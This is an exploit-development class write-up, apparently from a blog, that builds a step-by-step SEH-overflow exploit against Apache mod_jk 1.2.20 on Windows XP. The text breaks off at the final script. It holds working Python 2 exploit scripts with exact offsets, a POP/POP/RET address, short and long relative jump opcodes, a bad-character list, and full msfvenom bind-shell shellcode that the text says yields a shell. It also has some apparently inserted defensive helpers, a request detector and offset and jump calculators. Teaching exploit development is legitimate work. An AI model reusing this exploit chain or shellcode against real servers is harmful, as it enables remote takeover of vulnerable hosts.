Exploit Development Space Issues: A Relative Jump

Note: These are writeups for the exercise for a previous version of my Exploit Development class that I’m not releasing for free. They assume that you have read Chapters 16–19 of Penetration Testing: A Hands-On Introduction to Hacking Version 1 or equivalent.

So far we have had plenty of room for our shellcode after the SEH overwrite or at a register, but this will not always be the case. Many exploit developers go straight for the egghunter (discussed in the next post), but in some cases it may not be necessary. In this example we will use a simpler technique known as a relative jump (or long jump) to get to our shellcode.

For this example we will attack a vulnerability in an outdated Apache mod_jk 1.2.20 plugin on a Windows XP system (if you can’t find a copy of XP or the vulnerable software contact me and I’ll send you the book repo with the trials). As with our last few examples, we will be attacking the vulnerable service over the network from Kali. The exploit skeleton (modjkskel.py) is shown below.

#!/usr/bin/python
# Python 2 script: str is a byte string here, so everything built below goes
# out on the wire byte-for-byte.
import socket
import sys

# Target IP and port are taken from the command line rather than hardcoded.
ip = sys.argv[1]
port = int(sys.argv[2])

exploitstring = "A" * 5000

# The page name in the GET request carries the attack string.
buffer = "GET /" + exploitstring + ".html/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ip, port))
s.send(buffer)

Basically we are just sending an HTTP GET request for a long page name. Another thing to note is that this time the skeleton takes the IP address and port of the target as arguments. This is perhaps a better way of doing things than hardcoding these values as we have so far. Remember to include these values when you call the script.
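From the defender's side, the request the skeleton sends is easy to pick out on the wire. The following is an added Python 3 example, not part of the exercise code, that inspects one raw HTTP request and reports the traits this one has: a URI far beyond a sensible length limit, a long run of a single byte, and a request line without a proper HTTP version token. The 1024-byte limit and the function name are assumptions; the two sample requests are constructed to match the skeleton above and a normal GET.

```python
import re

# Assumed threshold; tune it to what the application legitimately serves.
MAX_URI = 1024


def inspect_request(raw):
    """Return a list of findings (strings) for one raw HTTP request (bytes).

    An empty list means nothing about the request line looked suspicious.
    """
    findings = []
    line, _, _ = raw.partition(b"\r\n")
    parts = line.split(b" ")
    if len(parts) < 2:
        return ["malformed request line"]
    method, uri = parts[0], parts[1]

    # A well-formed request line is "METHOD SP URI SP HTTP/x.y".  The
    # skeleton's line ends in ".html/1.0" with no space, so the third
    # token is missing entirely.
    if len(parts) < 3 or not parts[2].startswith(b"HTTP/"):
        findings.append("missing or malformed HTTP version token")

    if len(uri) > MAX_URI:
        findings.append("URI length %d exceeds %d" % (len(uri), MAX_URI))

    # Raw opcodes or encoded shellcode in a URI show up as non-printable bytes.
    if any(b < 0x20 or b > 0x7E for b in uri):
        findings.append("non-printable bytes in URI")

    # A run of 256 or more copies of one byte is classic padding.
    m = re.search(rb"(.)\1{255,}", uri, re.S)
    if m:
        findings.append("run of %d x %r" % (len(m.group(0)), m.group(1)))
    return findings


# Constructed samples: a normal request and the skeleton's 5000-A request.
SAMPLE_BENIGN = b"GET /index.html HTTP/1.0\r\n\r\n"
SAMPLE_SKELETON = b"GET /" + b"A" * 5000 + b".html/1.0\r\n\r\n"

if __name__ == "__main__":
    for name, sample in (("benign", SAMPLE_BENIGN), ("skeleton", SAMPLE_SKELETON)):
        print(name, inspect_request(sample))
```

Run against the skeleton's request the function reports three findings (missing version token, URI length 5010, a run of 5000 'A' bytes) and none for the benign request; the same checks are straightforward to port into a proxy or IDS rule.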

Of course, we first need to attach to the process in Immunity Debugger. You will notice there are two Apache processes running. We actually want to attach to the one that is not listening on port 80, as shown in the figure below.

Run the exploit skeleton

./modjkskel.py 10.0.0.46 80

We get an access violation when executing the instruction

6A6C73F3 880411 MOV BYTE PTR DS:[ECX+EDX],AL.

The program is unable to write to 04390000. Based on the instruction, this should be the sum of ECX and EDX. AL is the lowest 8 bits of EAX, but since this is a write error rather than a read error, it shouldn’t matter.

As usual, as we build our exploit we should ensure that we do not affect or lose the crash based on our input. We currently have control of SEH as shown in the figure below.

Now we need to use our cyclic pattern as usual. But the process does not like to restart nicely in Immunity Debugger. Detach and restart the process using the toolbar in the bottom right hand corner as shown below.

Now reattach in Immunity. Create the cyclic pattern with Mona.py as usual.

!mona pattern_create 5000

Replace the 5000 A’s in the exploit skeleton with the output.

#!/usr/bin/python
# Python 2 script; the 5000 A's are replaced by the Mona cyclic pattern.
import socket
import sys

ip = sys.argv[1]
port = int(sys.argv[2])

#exploitstring = "A" * 5000
exploitstring = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc9Fd0Fd1Fd2Fd3Fd4Fd5Fd6Fd7Fd8Fd9Fe0Fe1Fe2Fe3Fe4Fe5Fe6Fe7Fe8Fe9Ff0Ff1Ff2Ff3Ff4Ff5Ff6Ff7Ff8Ff9Fg0Fg1Fg2Fg3Fg4Fg5Fg6Fg7Fg8Fg9Fh0Fh1Fh2Fh3Fh4Fh5Fh6Fh7Fh8Fh9Fi0Fi1Fi2Fi3Fi4Fi5Fi6Fi7Fi8Fi9Fj0Fj1Fj2Fj3Fj4Fj5Fj6Fj7Fj8Fj9Fk0Fk1Fk2Fk3Fk4Fk5Fk6Fk7Fk8Fk9Fl0Fl1Fl2Fl3Fl4Fl5Fl6Fl7Fl8Fl9Fm0Fm1Fm2Fm3Fm4Fm5Fm6Fm7Fm8Fm9Fn0Fn1Fn2Fn3Fn4Fn5Fn6Fn7Fn8Fn9Fo0Fo1Fo2Fo3Fo4Fo5Fo6Fo7Fo8Fo9Fp0Fp1Fp2Fp3Fp4Fp5Fp6Fp7Fp8Fp9Fq0Fq1Fq2Fq3Fq4Fq5Fq6Fq7Fq8Fq9Fr0Fr1Fr2Fr3Fr4Fr5Fr6Fr7Fr8Fr9Fs0Fs1Fs2Fs3Fs4Fs5Fs6Fs7Fs8Fs9Ft0Ft1Ft2Ft3Ft4Ft5Ft6Ft7Ft8Ft9Fu0Fu1Fu2Fu3Fu4Fu5Fu6Fu7Fu8Fu9Fv0Fv1Fv2Fv3Fv4Fv5Fv6Fv7Fv8Fv9Fw0Fw1Fw2Fw3Fw4Fw5Fw6Fw7Fw8Fw9Fx0Fx1Fx2Fx3Fx4Fx5Fx6Fx7Fx8Fx9Fy0Fy1Fy2Fy3Fy4Fy5Fy6Fy7Fy8Fy9Fz0Fz1Fz2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh0Gh1Gh2Gh3Gh4Gh5Gh6Gh7Gh8Gh9Gi0Gi1Gi2Gi3Gi4Gi5Gi6Gi7Gi8Gi9Gj0Gj1Gj2Gj3Gj4Gj5Gj6Gj7Gj8Gj9Gk0Gk1Gk2Gk3Gk4Gk5Gk"

buffer = "GET /" + exploitstring + ".html/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ip, port))
s.send(buffer)

Send the exploit again. Note that the program crashes at the same instruction, but the values of ECX and EDX have changed. As long as their sum is not a writeable memory location we should be able to maintain the crash.

EDX (0x008a0660) points at offset 4495 in normal pattern (length 505)

Now use !mona findmsp to find our SEH overwrite.

[+] Examining SEH chain

SEH record (nseh field) at 0x0464ffa4 overwritten with normal pattern : 0x38714637 (offset 4403), followed by 84 bytes of cyclic data after the handler

I imagine you can already see our problem. We only have 84 bytes of space for our shellcode after the SEH overwrite. Clearly our previous method of a short jump straight into the shellcode is not going to work here.
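To see how findmsp arrives at offset 4403 (and why the overwriting value has to be read in little-endian order), here is an added Python 3 example that is not part of the exercise code: it regenerates the Aa0Aa1... pattern and searches it for the 32-bit value that landed in the handler field. The 5000-byte length and the value 0x38714637 come from the Mona output above; the function names are my own.

```python
import string
import struct


def pattern_create(length):
    """Build the cyclic pattern Mona's pattern_create emits: every triple is
    upper-case letter, lower-case letter, digit, so any 4-byte window is
    unique within the first 20280 bytes."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if len(out) * 3 >= length:
                    return "".join(out)[:length]
    return "".join(out)[:length]


def pattern_offset(value, length=5000):
    """Offset in the pattern of a 32-bit value read from a register or an SEH
    field, or -1 if it is not there.

    The debugger shows the value as a number (0x38714637); in memory it sits
    little-endian as the bytes 37 46 71 38, i.e. the text '7Fq8', so the
    needle is packed with '<I' before searching.
    """
    pattern = pattern_create(length)
    little = struct.pack("<I", value).decode("latin-1")
    off = pattern.find(little)
    if off != -1:
        return off
    # A common mistake is to type the bytes in the order they are displayed
    # in a memory dump; flag that case instead of silently returning -1.
    big = struct.pack(">I", value).decode("latin-1")
    if pattern.find(big) != -1:
        raise ValueError("value matches only when byte-swapped; read the "
                         "register little-endian")
    return -1


if __name__ == "__main__":
    # Value from the findmsp output above: the handler overwritten with 0x38714637.
    print(pattern_offset(0x38714637))   # 4403
```

The search returns 4403 because the pattern reads "...Fq7Fq8..." at that point: the '7' of triple 1467 followed by "Fq8", exactly the bytes 37 46 71 38 that findmsp reports for the handler.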

Let’s go ahead and verify our offsets as usual and deal with that problem when we come to it. Restart the program and replace the cyclic pattern with a new string to verify the offsets from findmsp.

#!/usr/bin/python
# Python 2 script: fixed markers at the offsets findmsp reported.
import socket
import sys

ip = sys.argv[1]
port = int(sys.argv[2])

#exploitstring = "A" * 5000
length = 5000

firstpart = "A" * 4403     # padding up to the SEH record (offset 4403)
nseh = "B" * 4             # next SEH pointer
seh = "C" * 4              # SEH handler address

exploitstring = firstpart + nseh + seh
# Pad with D's so the total length stays at 5000 and the crash is unchanged.
exploitstring += "D" * (length - len(exploitstring))

buffer = "GET /" + exploitstring + ".html/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ip, port))
s.send(buffer)

As shown in the figure below our offsets line up as expected. NSEH is overwritten with B’s and the SEH handler is overwritten with C’s.

Pass the exception with Shift+F9. We see that as expected NSEH is at ESP+8.

If we follow ESP+8 on the stack we see our D’s which appear to be running off the end of the stack.

If we scroll up we see our A’s before NSEH. In fact all 4403 A’s are present in memory. We could use a short jump to jump back into our A’s. However, we are limited in how far we can jump using a short jump.

Open up Metasm in Kali from /usr/share/metasploit-framework/tools. As shown below, if we try to jump backwards from our current location by more than 123 bytes, instead of our 2-byte short jump beginning with \xeb we end up with a five-byte jump starting with \xe9. This is of course too big to fit in our 4-byte NSEH. There’s nothing to stop us from first taking the normal short jump (forward or backwards will work, as we have 4403 bytes for our shellcode) and then, once we have more space to work with, taking a second jump, this time the longer relative jump.

metasm > jmp $-123
"\xeb\x83"
metasm > jmp $-124
"\xe9\x7f\xff\xff\xff"

But we are getting a bit ahead of ourselves. Let’s get our POP/POP/RET and short jump in place as we covered previously before worrying about the relative jump. Before choosing a POP/POP/RET we should check for bad characters. We learned how to find bad characters in a previous post, and time permitting you can run through the process here as well, but for reference the bad characters for this example are shown below.

Badchars = "\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c"

We can use this list when using Mona.py to find POP/POP/RET candidates for our SEH overwrite.

!mona seh -cpb '\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c'

We can choose the first candidate from Mona.py’s output: 0x6eec6317 and replace our C’s in the previous exploit with this memory address in little endian format. While we are here we can replace NSEH with our short jump as well.

#!/usr/bin/python
# Python 2 script: short jump in NSEH, POP/POP/RET address in SEH.
import socket
import sys

ip = sys.argv[1]
port = int(sys.argv[2])

#exploitstring = "A" * 5000
length = 5000

firstpart = "A" * 4403
nseh = "\xeb\x06\x41\x41"   # jmp short +6: skips the SEH address, lands on the D's
seh = "\x17\x63\xec\x6e"    # 0x6eec6317 (POP/POP/RET from Mona), little endian

exploitstring = firstpart + nseh + seh
exploitstring += "D" * (length - len(exploitstring))

buffer = "GET /" + exploitstring + ".html/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ip, port))
s.send(buffer)

Put a breakpoint on the POP/POP/RET in SEH with F2 before passing the exception. Use F7 to move through the POP/POP/RET and the short jump to land at the beginning of the D’s.

Now we can add a relative jump at the beginning of our D’s to take us back to our A’s. Even with our bad characters, 4403 bytes should be enough space for any payload we like. We can use Metasm to get the correct opcode to jump back to the beginning of our A’s. Keep in mind that we need to account for NSEH and SEH as well, taking us back 4403 + 8 = 4411 bytes.

metasm > jmp $-4411
"\xe9\xc0\xee\xff\xff"

This does not contain any bad characters so jumping to the beginning of the attack string will work fine in this case (had there been a bad character we would need to adjust how far we jumped accordingly).
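The displacement arithmetic behind both Metasm outputs above, as an added Python 3 example that is not the exercise's own code: the CPU adds a jmp's displacement to the address of the instruction that follows it, so a 2-byte short jmp stores the distance minus 2 and a 5-byte near jmp stores the distance minus 5, both measured from the start of the jmp (Metasm's $). The encoder takes the form explicitly rather than choosing it the way Metasm does; the decoder recovers the distance from captured bytes, which is the direction an analyst usually works in; and jump_back_to_start works the 4403 + 8 case through and checks the result against the page's bad-character list. All function names are assumptions.

```python
import struct

# Bad characters for this target, as listed on the page.
BADCHARS = b"\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c"


def encode_jmp(distance, short):
    """Encode an x86 relative jmp whose target lies `distance` bytes from the
    START of the jmp itself (negative = backwards).  The stored displacement
    is relative to the next instruction, hence the -2 / -5."""
    if short:
        disp = distance - 2
        if not -128 <= disp <= 127:
            raise ValueError("distance %d does not fit a short jmp" % distance)
        return b"\xeb" + struct.pack("<b", disp)      # EB rel8
    disp = distance - 5
    return b"\xe9" + struct.pack("<i", disp)          # E9 rel32


def decode_jmp(code):
    """Inverse of encode_jmp: distance from the start of the jmp to its target."""
    if code[0] == 0xEB:
        return struct.unpack("<b", code[1:2])[0] + 2
    if code[0] == 0xE9:
        return struct.unpack("<i", code[1:5])[0] + 5
    raise ValueError("not a relative jmp")


def contains_badchars(code, badchars=BADCHARS):
    """Sorted list of bad-character values present in code (empty = clean)."""
    return sorted(set(code) & set(badchars))


def jump_back_to_start(firstpart_len, nseh_len=4, seh_len=4, badchars=BADCHARS):
    """Near jmp placed immediately after the SEH record that lands on the first
    byte of the attack string, plus any bad characters it contains.  With the
    page's layout (4403 + 4 + 4) this is Metasm's jmp $-4411."""
    distance = -(firstpart_len + nseh_len + seh_len)
    code = encode_jmp(distance, short=False)
    return code, contains_badchars(code, badchars)


if __name__ == "__main__":
    print(encode_jmp(-123, short=True))      # b'\xeb\x83'
    print(encode_jmp(-124, short=False))     # b'\xe9\x7f\xff\xff\xff'
    print(jump_back_to_start(4403))          # (b'\xe9\xc0\xee\xff\xff', [])
    print(decode_jmp(b"\xe9\xc0\xee\xff\xff"))   # -4411
```

Note that a short jmp can in principle hold displacements down to -128 (a distance of -126 from $), so the exact point where Metasm switches to the five-byte form is an assembler choice; the encoder above only refuses a short form that genuinely cannot hold the displacement. The bad-character check is what tells you whether a given padding length is usable: shifting firstpart_len to 4563, for instance, puts a 0x20 into the displacement.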

#!/usr/bin/python
# Python 2 script: relative jump back to the start of the attack string.
import socket
import sys

ip = sys.argv[1]
port = int(sys.argv[2])

#exploitstring = "A" * 5000
length = 5000

firstpart = "A" * 4403
nseh = "\xeb\x06\x41\x41"   # jmp short +6 over the SEH address
seh = "\x17\x63\xec\x6e"    # 0x6eec6317 POP/POP/RET, little endian

exploitstring = firstpart + nseh + seh
exploitstring += "\xe9\xc0\xee\xff\xff"   # jmp $-4411: back to the first A
exploitstring += "D" * (length - len(exploitstring))

buffer = "GET /" + exploitstring + ".html/1.0\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect = s.connect((ip, port))
s.send(buffer)

The addition of the relative jump does indeed bring us exactly to the beginning of our attack string as shown below.

Now we just need to add some shellcode. With the help of our relative jump we now have plenty of space for any payload we would like. Don’t forget to avoid the bad characters.

msfvenom -p windows/shell_bind_tcp -b '\x00\x09\x0a\x0b\x0c\x0d\x20\x23\x25\x26\x2f\x3b\x3f\x5c' -s 4403 -f py
[-] x86/shikata_ga_nai failed: Msf::BadcharError : Encoding failed due to a bad character (index=264, char=0x0d)
[-] x86/countdown failed: Msf::BadcharError : Encoding failed due to a bad character (index=357, char=0x00)
[-] generic/none failed: Msf::BadcharError : Encoding failed due to a bad character (index=3, char=0x00)
[-] x86/jmp_call_additive failed: Msf::BadcharError : Encoding failed due to a bad character (index=7, char=0x0c)
[*] x86/call4_dword_xor succeeded with size 368 (iteration=1)
buf = ""
buf += "\x2b\xc9\x83\xe9\xaa\xe8\xff\xff\xff\xff\xc0\x5e\x81"
buf += "\x76\x0e\xb1\x9a\x90\x8d\x83\xee\xfc\xe2\xf4\x4d\x72"
buf += "\x19\x8d\xb1\x9a\xf0\x04\x54\xab\x42\xe9\x3a\xc8\xa0"
buf += "\x06\xe3\x96\x1b\xdf\xa5\x11\xe2\xa5\xbe\x2d\xda\xab"
buf += "\x80\x65\xa1\x4d\x1d\xa6\xf1\xf1\xb3\xb6\xb0\x4c\x7e"
buf += "\x97\x91\x4a\x53\x6a\xc2\xda\x3a\xc8\x80\x06\xf3\xa6"
buf += "\x91\x5d\x3a\xda\xe8\x08\x71\xee\xda\x8c\x61\xca\x1b"
buf += "\xc5\xa9\x11\xc8\xad\xb0\x49\x73\xb1\xf8\x11\xa4\x06"
buf += "\xb0\x4c\xa1\x72\x80\x5a\x3c\x4c\x7e\x97\x91\x4a\x89"
buf += "\x7a\xe5\x79\xb2\xe7\x68\xb6\xcc\xbe\xe5\x6f\xe9\x11"
buf += "\xc8\xa9\xb0\x49\xf6\x06\xbd\xd1\x1b\xd5\xad\x9b\x43"
buf += "\x06\xb5\x11\x91\x5d\x38\xde\xb4\xa9\xea\xc1\xf1\xd4"
buf += "\xeb\xcb\x6f\x6d\xe9\xc5\xca\x06\xa3\x71\x16\xd0\xd9"
buf += "\xa9\xa2\x8d\xb1\xf2\xe7\xfe\x83\xc5\xc4\xe5\xfd\xed"
buf += "\xb6\x8a\x4e\x4f\x28\x1d\xb0\x9a\x90\xa4\x75\xce\xc0"
buf += "\xe5\x98\x1a\xfb\x8d\x4e\x4f\xc0\xdd\xe1\xca\xd0\xdd"
buf += "\xf1\xca\xf8\x67\xbe\x45\x70\x72\x64\x13\x57\xbc\x6a"
buf += "\xc9\xf8\x8f\xb1\x8b\xcc\x04\x57\xf0\x80\xdb\xe6\xf2"
buf += "\x52\x56\x86\xfd\x6f\x58\xe2\xcd\xf8\x3a\x58\xa2\x6f"
buf += "\x72\x64\xc9\xc3\xda\xd9\xee\x7c\xb6\x50\x65\x45\xda"
buf += "\x38\x5d\xf8\xf8\xdf\xd7\xf1\x72\x64\xf2\xf3\xe0\xd5"
buf += "\x9a\x19\x6e\xe6\xcd\xc7\xbc\x47\xf0\x82\xd4\xe7\x78"
buf += "\x6d\xeb\x76\xde\xb4\xb1\xb0\x9b\x1d\xc9\x95\x8a\x56"
buf += "\x8d\xf5\xce\xc0\xdb\xe7\xcc\xd6\xdb\xff\xcc\xc6\xde"
buf += "\xe7\xf2\xe9\x41\x8e\x1c\x6f\x58\x38\x7a\xde\xdb\xf7"
buf += "\x65\xa0\xe5\xb9\x1d\x8d\xed\x4e\x4f\x2b\x7d\x04\x38"
buf += "\xc6\xe5\x17\x0f\x2d\x10\x4e\x4f\xac\x8b\xcd\x90\x10"
buf += "\x76\x51\xef\x95\x36\xf6\x89\xe2\xe2\xdb\x9a\xc3\x72"
buf += "\x64\x9a\x90\x8d"

Prepending this shellcode to the beginning of our exploit string gets us a bind shell when we run the exploit.

#!/usr/bin/python
# Python 2 script: final exploit with the msfvenom payload at the front of the
